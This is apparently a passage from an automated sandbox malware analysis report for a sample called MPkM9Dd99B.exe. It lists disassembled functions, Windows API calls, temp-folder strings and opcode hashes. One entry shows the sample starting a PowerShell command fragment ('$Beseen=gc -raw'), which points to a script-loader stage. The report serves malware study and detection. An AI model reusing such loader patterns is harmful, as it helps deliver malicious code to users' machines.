                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: PrivateProfileString
                                • String ID:
                                • API String ID: 1096422788-0
                                • Opcode ID: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
                                • Instruction ID: 16d05768d70be94792168112439c0a82a49a1a045ba9b991e9e4b5323ac17763
                                • Opcode Fuzzy Hash: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
                                • Instruction Fuzzy Hash: 2CE04F3190821DBAEB007FA08F09AAD2A69AF01720F10002AFA507A0D1E6B98583971D
                                Function 00406113 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,004061A1,?,?,?,?,00000000,?), ref: 00406137
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Open
                                • String ID:
                                • API String ID: 71445658-0
                                • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                • Instruction ID: 4278cf0171cf0b678593f71500b3925c4415a8e9ce87015ff7d519d2eb21bae6
                                • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                • Instruction Fuzzy Hash: BCD0123204020DBBDF119E90AD01FAB3B1DEB48350F014826FE07A8091D775D570A724
                                Function 004015C2 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                Download Yara Rule
                                APIs
                                • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015CD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 93233afc89f5dcba0ebf1b763322780f207c5d8236f145893b8d4ae7afdee906
                                • Instruction ID: 7d2cdf6a56bb8b2c4d8e447006d96498fe5724c9cded2cbb68f68f822827988b
                                • Opcode Fuzzy Hash: 93233afc89f5dcba0ebf1b763322780f207c5d8236f145893b8d4ae7afdee906
                                • Instruction Fuzzy Hash: BED01732708214DBDF60DBA8AF08A9FB3A4AB10328B20413BD211F21D1D6B9C5469B2D
                                Function 00404379 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageA.USER32(0001043C,00000000,00000000,00000000), ref: 0040438B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
                                • Instruction ID: f513ac05e70e3adf76b651c0ca8ec4e95b66ff2fdc1b64d79a05bcbbe3c40a95
                                • Opcode Fuzzy Hash: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
                                • Instruction Fuzzy Hash: 4DC09BB17403027BFE209B529E45F077798D790700F1554397754F54D0C774D410D62C
                                Function 00404362 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: f6c8117e81de0903b802e48e7999fd2a70a6c35278de0d39013be8dd7138c214
                                • Instruction ID: 50a7fc5ec129452a525cde7c4fd9a9aa290cced010421ab9f43a5acdc6dad314
                                • Opcode Fuzzy Hash: f6c8117e81de0903b802e48e7999fd2a70a6c35278de0d39013be8dd7138c214
                                • Instruction Fuzzy Hash: 33B0127A781601BBDE615B40DF09F457EB2E768701F408039B348240F0CEB200A9DB2C
                                Function 00405969 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteExA.SHELL32(?,00404774,?), ref: 00405978
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: ExecuteShell
                                • String ID:
                                • API String ID: 587946157-0
                                • Opcode ID: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                • Instruction ID: 923d99ad9cc7c2cd2e65252a1a37f78a8d30594c4c7a615bb4925eb6a4e84790
                                • Opcode Fuzzy Hash: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                • Instruction Fuzzy Hash: 27C092B2000200DFE301CF90CB08F067BF8AF54306F028068E184DA060C7788840CB29
                                Function 00403390 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                Download Yara Rule
                                APIs
                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030F6,?,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 0040339E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: FilePointer
                                • String ID:
                                • API String ID: 973152223-0
                                • Opcode ID: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                • Instruction ID: 699dda5fb03a211c19396a68767747e6c986426da1756d7c47186a7ffa8d2f84
                                • Opcode Fuzzy Hash: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                • Instruction Fuzzy Hash: EBB01231140300BFDA214F00DF09F057B21AB94710F10C034B384780F086711075EB0E
                                Function 0040434F Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                Download Yara Rule
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,0040412B), ref: 00404359
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: b7efc8905e9f2a5b3d5d2c2477723ee0501502072c4fff85560e1a7fdf79de64
                                • Instruction ID: b84ed7fd3cc5f3c3e9fcd53eb4babc11f88d3e7fa425116ebe2a9639eb74f9e6
                                • Opcode Fuzzy Hash: b7efc8905e9f2a5b3d5d2c2477723ee0501502072c4fff85560e1a7fdf79de64
                                • Instruction Fuzzy Hash: 28A00176505500AFCA12AB50EF1980ABB66ABA4741B818479A685601358B768831EB1B
                                Function 00401FA0 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004053D1: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                  • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                  • Part of subcall function 004053D1: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,004032C3,004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0), ref: 0040542D
                                  • Part of subcall function 004053D1: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\), ref: 0040543F
                                  • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                  • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                  • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                  • Part of subcall function 00405926: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042BC90,?,"$Beseen=gc -raw ',"$Beseen=gc -raw ',?,Bje gka",00000000), ref: 0040594F
                                  • Part of subcall function 00405926: CloseHandle.KERNEL32(?), ref: 0040595C
                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FE5
                                  • Part of subcall function 0040672A: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040673B
                                  • Part of subcall function 0040672A: GetExitCodeProcess.KERNEL32(?,?), ref: 0040675D
                                  • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                • String ID:
                                • API String ID: 2972824698-0
                                • Opcode ID: 1750d852ef655aad6943f12ff86d7c5be13c4aa94793d558f94d59855ccbac7d
                                • Instruction ID: 2907458289dc89520fdc1db2e5a40f60bb15031deda838765eaf0f6b46983df9
                                • Opcode Fuzzy Hash: 1750d852ef655aad6943f12ff86d7c5be13c4aa94793d558f94d59855ccbac7d
                                • Instruction Fuzzy Hash: 0EF05B31905112DBCF20ABA55D849EF71E4DB0135CB11413FF501F21D2D7BC4A46DAAE

                                Non-executed Functions

                                Function 004047BF Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,000003FB), ref: 0040480E
                                • SetWindowTextA.USER32(00000000,?), ref: 00404838
                                • SHBrowseForFolderA.SHELL32(?,00429860,?), ref: 004048E9
                                • CoTaskMemFree.OLE32(00000000), ref: 004048F4
                                • lstrcmpiA.KERNEL32(Remove folder: ,0042A488), ref: 00404926
                                • lstrcatA.KERNEL32(?,Remove folder: ), ref: 00404932
                                • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404944
                                  • Part of subcall function 00405987: GetDlgItemTextA.USER32(?,?,00000400,0040497B), ref: 0040599A
                                  • Part of subcall function 00406587: CharNextA.USER32(0000000C,*?|<>/":,00000000,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                  • Part of subcall function 00406587: CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                  • Part of subcall function 00406587: CharNextA.USER32(0000000C,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                  • Part of subcall function 00406587: CharPrevA.USER32(0000000C,0000000C,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                • GetDiskFreeSpaceA.KERNEL32(00429458,?,?,0000040F,?,00429458,00429458,?,00000001,00429458,?,?,000003FB,?), ref: 00404A02
                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A1D
                                  • Part of subcall function 00404B76: lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                  • Part of subcall function 00404B76: wsprintfA.USER32 ref: 00404C1C
                                  • Part of subcall function 00404B76: SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                • String ID: A$C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth$Remove folder: $Under i$
                                • API String ID: 2624150263-95278080
                                • Opcode ID: 567ce88d34589bf6eeab6899079dde505d6e7e3ce3a67d291d99f9f78f3e16cb
                                • Instruction ID: f53f9ae5ebeaccab956e1b2ad526c51027fc30446c854342799b5ba7b8d0bc76
                                • Opcode Fuzzy Hash: 567ce88d34589bf6eeab6899079dde505d6e7e3ce3a67d291d99f9f78f3e16cb
                                • Instruction Fuzzy Hash: BAA172F1A00209ABDB11AFA5CD45AAF76B8EF84314F14807BF611B62D1D77C89418F6D
                                Function 00402198 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.OLE32(0040851C,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040221D
                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022CF
                                Strings
                                • C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Forsmgtede, xrefs: 0040225D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID: C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Forsmgtede
                                • API String ID: 123533781-3557324615
                                • Opcode ID: 26e4af273d4ad834d7dd4ca4c27adc144b69110a5e0929a66cb48c7bfc0a4cbf
                                • Instruction ID: 9693176738af107330769ac86e8646dde0b712c02a361864b0ed1875b7ced88a
                                • Opcode Fuzzy Hash: 26e4af273d4ad834d7dd4ca4c27adc144b69110a5e0929a66cb48c7bfc0a4cbf
                                • Instruction Fuzzy Hash: DB511971A00208AFDF00EFA4CA88A9D7BB5FF48314F2045BAF505FB2D1DA799981CB54
                                Function 004027CF Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027DE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: FileFindFirst
                                • String ID:
                                • API String ID: 1974802433-0
                                • Opcode ID: 930922f26d5cdd011eb09c6a8250f7f43846b17323c9774391e4e916de6dacb1
                                • Instruction ID: 474e59c826447b87e47a37c01b73ad662870a85b7ff57bc711f4e8679485c19e
                                • Opcode Fuzzy Hash: 930922f26d5cdd011eb09c6a8250f7f43846b17323c9774391e4e916de6dacb1
                                • Instruction Fuzzy Hash: 9CF0A771605110DFDB51EBA49E49AEE77689F21314F6005BBE141F20C2C6B889469B2E
                                Function 00406AFA Relevance: .3, Instructions: 334COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
                                • Instruction ID: 8768c5d39ca9d5d04b1d74764d0b3cf6a08d2071900a395e822ff8491b177041
                                • Opcode Fuzzy Hash: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
                                • Instruction Fuzzy Hash: D0E18B7190470ACFDB24CF58C880BAAB7F1FB44305F15842EE497A72D1E738AA95CB14
                                Function 004072D1 Relevance: .3, Instructions: 300COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
